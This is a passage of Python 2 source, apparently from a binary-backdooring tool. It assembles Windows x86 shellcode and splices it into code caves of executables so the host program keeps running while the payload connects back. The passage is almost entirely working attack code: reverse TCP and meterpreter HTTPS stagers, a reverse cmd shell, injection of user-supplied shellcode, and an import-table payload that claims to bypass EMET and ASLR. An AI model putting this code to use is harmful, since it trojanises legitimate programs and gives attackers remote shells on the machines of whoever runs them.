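        # wrapped in these so the host program's registers and flags survive
        # and its original code can keep running afterwards.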
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
        for octet in self.HOST.split('.'):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
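    # e.g. with HOST '192.168.1.20', pack_ip_addresses() returns the raw bytes
    # '\xc0\xa8\x01\x14', ready to splice into a shellcode push instruction.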
def returnshellcode(self):
return self.shellcode
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
        self.shellcode2 += struct.pack('!H', self.PORT)  # unsigned so ports above 32767 pack correctly
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
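    # The cave-jumping arithmetic above is ordinary x86 rel32 encoding: a
    # 5-byte E9/E8 instruction takes operand = target - (opcode_address + 5),
    # with backward jumps expressed via 0xffffffff wraparound.  A toy sketch
    # (the addresses are made up for illustration):
    #
    #   import struct
    #   def rel32(src, dst):
    #       # src = address of the E9/E8 opcode byte
    #       return struct.pack('<i', dst - (src + 5))
    #   rel32(0x1000, 0x1100)  # -> '\xfb\x00\x00\x00' (forward jump)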
def cave_miner(self, flItms, CavesPicked={}):
"""
        Sample code for finding suitable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
            self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'rb').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
        self.shellcode2 += struct.pack('!H', self.PORT)  # PORT (network order, unsigned)
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
if 'LoadLibraryA' not in flItms:
            print("[!] Binary does not have the LoadLibraryA API in IAT")
return False
if 'GetProcAddress' not in flItms:
            print("[!] Binary does not have the GetProcAddress API in IAT")
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", (flItms['CodeCaveVirtualAddress'] +
len(self.shellcode1) +
len(self.stackpreserve) +
flItms['buffer'] + 201
)
)
else:
                # 4-byte placeholder when no code cave virtual address is known
                self.shellcode1 += '\x00\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", int(flItms['CavesPicked'][0][1], 16) -
diskLOCofSection +
VirtualLOCofSection +
flItms['ImageBase'] +
len(self.shellcode1) +
len(self.stackpreserve) +
9)
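        # CALL $+5 / POP ESI is the classic get-EIP trick; subtracting the
        # precomputed address in EBX leaves the ASLR slide in ESI (zero when
        # the image loaded at its preferred base).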
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
